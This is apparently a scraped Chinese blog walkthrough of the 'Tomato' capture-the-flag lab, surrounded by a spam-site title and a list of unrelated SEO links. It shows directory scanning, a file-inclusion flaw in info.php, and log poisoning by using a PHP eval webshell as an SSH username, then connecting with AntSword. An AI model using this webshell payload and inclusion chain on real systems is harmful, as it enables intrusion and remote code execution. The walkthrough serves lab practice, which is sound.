当前位置: 首页 > news >正文

继续网站建设国际局势最新消息今天

继续网站建设,国际局势最新消息今天,cosplay wordpress,wordpress 默认端口步骤一,我们来到tomato页面 什么也弄不了只有一番茄图片 弱口令不行,xxs也不行,xxe还是不行 我们来使用kali来操作... 步骤二,使用dirb再扫一下, dirb http://172.16.1.133 1.发现这个文件可以访问.我们来访问一下 /antibot_i…

步骤一,我们来到tomato页面

什么也弄不了只有一番茄图片

弱口令不行,xxs也不行,xxe还是不行

我们来使用kali来操作...

步骤二,使用dirb再扫一下, dirb http://172.16.1.133

1.发现这个文件可以访问.我们来访问一下

/antibot_image/

2.我们来看看他文件里面有什么东西是我们可以利用的!

3.找到网站绝对路径 info.php我们来点击进去

4.查看页面源代码 可以发现image的文件包含.

5.在info.php后面输入?image=/etc/passwd显示成功,说明存在文件包含漏洞

最下边

步骤三,将一句话木马作为ssh登录的用户名登录

1.输入

ssh '<?php phpinfo();eval($_POST["cmd"]);?>'@172.16.1.113 -p 2211

将一句话木马作为ssh登录的用户名,然后登陆,密码随便输入,这样日志文件就会记录该用户登录失败的日志,而该用户的用户名就是我们的一句话木马。

2.页面通过image传参查看日志文件

/var/log/auth.log

这个很阁僚...一开始有中间有下边还有,不过我问了一下说有就行了

发现多了一些报错信息,大概率写入木马成功.

步骤四,直接使用蚁剑进行连接:

http://172.16.1.113/antibot_image/antibots/info.php?image=/var/log/auth.log

密码:cmd

连接成功

http://www.yidumall.com/news/30299.html

相关文章:

  • 做网站什么时候注册商标百度免费推广
  • 杭州做模板网站seo搜索引擎营销工具
  • 佛山网站建设玲念建站企业网站优化技巧
  • 深圳珠宝网站建设北京seo优化wyhseo
  • 公司建设网站的费用吗网络营销方式有几种
  • 深圳制作网站搜行者seo网站上做推广
  • ftp怎么修改网站短视频推广策略
  • 凤岗建设网站seo服务是什么意思
  • 网站建设年份查询快速收录工具
  • 网站服务器在哪里优化营商环境心得体会个人
  • 做网站要考虑的班级优化大师使用指南
  • 佛山网站建设公司哪家便宜长春seo排名外包
  • 绍兴做企业网站的公司网络营销平台推广方案
  • 不干净的网站做性百度代理服务器
  • 微信营销工具有哪些seo怎样才能优化网站
  • 政府网站建设项目背景识图找图
  • 做淘宝网站销售怎么样电商平台怎么推广
  • 建站工具交流网络软文发布平台
  • 做网站副业嘉兴百度快照优化排名
  • 做网站时遇到的问题广告代理公司
  • 濮阳做网站设计营销宣传图片
  • 政府网站开发的目的品牌宣传的推广
  • 网站开发方案 ppt系统优化工具
  • 山东建设科技产品推广网站广州营销推广
  • 响应式博客wordpress宁波seo外包快速推广
  • 万网做网站山东今日热搜
  • 社交网站备案搭建一个网站需要多少钱?
  • web网站开发源码下载网络营销的特点和优势
  • 品牌网站建设方互联网营销师怎么做
  • 贵州城乡住房建设厅网站百度小说搜索热度排行榜